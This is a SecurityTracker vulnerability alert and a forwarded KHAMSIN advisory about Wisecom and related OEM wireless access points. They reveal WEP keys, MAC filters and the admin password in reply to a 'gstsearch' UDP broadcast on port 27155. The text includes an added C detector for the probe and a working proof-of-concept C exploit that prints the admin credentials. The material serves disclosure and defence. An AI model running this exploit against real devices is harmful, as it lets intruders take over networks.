SecurityTracker.com
Category:   Device (Router/Bridge/Hub)  >   Wireless Access Point (Wisecom)
Vendors:   Wisecom
Wisecom Wireless Access Point Discloses Encryption Keys and Passwords to Remote Users
SecurityTracker Alert ID:  1005531
SecurityTracker URL:  http://securitytracker.com/id/1005531
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Nov 5 2002
Impact:   Disclosure of authentication information, Disclosure of system information, User access via network
Exploit Included:  Yes  
Version(s): GL2422AP-0T
Description:   A vulnerability was reported in a Wisecom Wireless Access Point device, manufactured by Global Sun Technologies. The device discloses WEP keys, the administrator password, and other information to remote users.

It is reported that a remote user on the local network or on the wireless network can send a broadcast packet to UDP port 27155 containing the string "gstsearch" to cause the device to return sensitive information. According to the report, the device will return the WEP keys, the MAC access control filter, and the 'admin' account password.

The vulnerable device is apparently sold to other manufacturers, so additional vendor models may be vulnerable. Some of the potentially affected models may include:

D-Link DWL-900AP+ B1 version 2.1 and 2.2
ALLOY GL-2422AP-S
EUSSO GL2422-AP
LINKSYS WAP11-V2.2

A demonstration exploit is provided in the Source Message.

Other users report that the D-Link DI-614+ (apparently based on the affected GL2422RT) is not vulnerable but the Linksys WAP11-V2.2 appears to be at least partially affected.

Impact:   A remote user on the local network or the wireless network can obtain the device's WEP keys, MAC filter, and 'admin' account password.
Solution:   No solution was available at the time of this entry.
Vendor URL:  wisecom-europe.com/wireless-1.htm
Cause:   Access control error

Message History:   None.
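
The check below is an added example, not part of the SecurityTracker alert or the KHAMSIN advisory: a C function that a monitoring tool could apply to captured IPv4 packets to flag the "gstsearch" probe to UDP port 27155 described above. The function names, the raw-IPv4 input format (no link-layer header) and the sample packets built by build_sample are assumptions made for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define GST_PORT  27155        /* UDP port named in the alert */
#define GST_PROBE "gstsearch"  /* probe string named in the alert */

/* Return 1 if pkt (raw IPv4 packet, no link-layer header) is an unfragmented
 * UDP datagram to GST_PORT whose payload starts with GST_PROBE, else 0. */
int is_gstsearch_probe(const uint8_t *pkt, size_t len)
{
    size_t ihl, udp_len, n = strlen(GST_PROBE);
    if (len < 20 || (pkt[0] >> 4) != 4)
        return 0;              /* too short or not IPv4 */
    ihl = (size_t)(pkt[0] & 0x0f) * 4;
    if (ihl < 20 || len < ihl + 8 || pkt[9] != 17 || (pkt[6] & 0x1f) || pkt[7])
        return 0;              /* bad IHL, truncated, not UDP, or later fragment */
    const uint8_t *udp = pkt + ihl;
    udp_len = ((size_t)udp[4] << 8) | udp[5];
    if (((udp[2] << 8) | udp[3]) != GST_PORT || udp_len < 8 || udp_len > len - ihl)
        return 0;              /* other port, or length field exceeds capture */
    return udp_len - 8 >= n && memcmp(udp + 8, GST_PROBE, n) == 0;
}

/* Build a constructed sample IPv4/UDP packet (checksums left zero). */
size_t build_sample(uint8_t *buf, uint16_t dport, const char *payload)
{
    size_t plen = strlen(payload), total = 28 + plen;
    memset(buf, 0, total);
    buf[0] = 0x45;                              /* IPv4, 20-byte header */
    buf[2] = (uint8_t)(total >> 8); buf[3] = (uint8_t)total;
    buf[8] = 64; buf[9] = 17;                   /* TTL, protocol = UDP */
    buf[12] = 192; buf[14] = 2; buf[15] = 10;   /* src 192.0.2.10 (constructed) */
    memset(buf + 16, 0xff, 4);                  /* dst 255.255.255.255 */
    buf[20] = 0xc0;                             /* src port 49152 (constructed) */
    buf[22] = (uint8_t)(dport >> 8); buf[23] = (uint8_t)dport;
    buf[24] = (uint8_t)((8 + plen) >> 8); buf[25] = (uint8_t)(8 + plen);
    memcpy(buf + 28, payload, plen);
    return total;
}

int main(void)
{
    uint8_t p[128];
    printf("probe:      %d\n", is_gstsearch_probe(p, build_sample(p, 27155, "gstsearch")));
    printf("other port: %d\n", is_gstsearch_probe(p, build_sample(p, 53, "gstsearch")));
    printf("other data: %d\n", is_gstsearch_probe(p, build_sample(p, 27155, "hello")));
    return 0;
}
```
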


 Source Message Contents

Subject:  Accesspoints disclose wep keys, password and mac filter (fwd)



KHAMSIN Security News
KSN Reference: 2002-11-01 0001 ULO
---------------------------------------------------------------------------

Title
-----
        Accesspoints disclose wep keys, password and mac filter

Date
----
        2002-11-01


Description:
------------

GlobalSunTech develops Wireless Access Points for OEM customers like
Linksys, D-Link and others. Capturing the traffic of a WISECOM GL2422AP-0T
during the setup phase showed a security problem.

Sending a broadcast packet to UDP port 27155 containing the string
"gstsearch" causes the accesspoint to return wep keys, mac filter and
admin password. This happens on the WLAN Side and on the LAN Side.


Systems Affected
----------------
        Vulnerable, tested, OEM Version from GlobalSunTech:
                WISECOM GL2422AP-0T

        Possibly vulnerable, not tested, OEM Version from GlobalSunTech:
                D-Link DWL-900AP+ B1 version 2.1 and 2.2
                ALLOY GL-2422AP-S
                EUSSO GL2422-AP
                LINKSYS WAP11-V2.2


Proof of concept:
-----------------

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <arpa/inet.h>          /* inet_addr() */
#include <sys/socket.h>

/* Fields of the reply that this program prints */
typedef struct {
        char type[28];
        char name[32];
        char user[16];
        char pass[16];
}
__attribute__ ((packed)) answer;

int main(void)
{
        char rcvbuffer[1024];
        struct sockaddr_in sin;
        answer* ans = (answer *)rcvbuffer;
        int sd, ret, val;

        /* Zero both buffers so short replies and unused fields are defined */
        memset(rcvbuffer, 0, sizeof(rcvbuffer));
        memset(&sin, 0, sizeof(sin));

        sin.sin_family          = AF_INET;
        sin.sin_addr.s_addr     = inet_addr("255.255.255.255");
        sin.sin_port            = htons(27155);

        sd = socket(AF_INET, SOCK_DGRAM, 0);
        if (sd < 0)
        {
                perror("socket");
                exit(1);
        }

        /* Broadcast destinations require SO_BROADCAST on the socket */
        val = 1;
        ret = setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &val, sizeof(val));
        if (ret < 0)
        {
                perror("setsockopt");
                exit(1);
        }

        ret = sendto(sd, "gstsearch", 9, 0, (struct sockaddr *)&sin, sizeof(sin));
        if (ret < 0)
        {
                perror("sendto");
                exit(1);
        }

        ret = read(sd, rcvbuffer, sizeof(rcvbuffer));
        if (ret < 0)
        {
                perror("read");
                exit(1);
        }

        /* Fields are fixed-width and may lack a terminating NUL */
        printf("Type            : %.28s\n",ans->type);
        printf("Announced Name  : %.32s\n",ans->name);
        printf("Admin Username  : %.16s\n",ans->user);
        printf("Admin Password  : %.16s\n",ans->pass);

        close(sd);
        return 0;
}

Disclaimer
-----------

        This advisory does not claim to be complete or to be usable for
        any purpose. Especially information on the vulnerable systems may
        be inaccurate or wrong. Possibly supplied exploit code is not to
        be used for malicious purposes, but for educational purposes only.
        This advisory is free for open distribution in unmodified form.

        http://www.khamsin.ch




 
 



Copyright 2021, SecurityGlobal.net LLC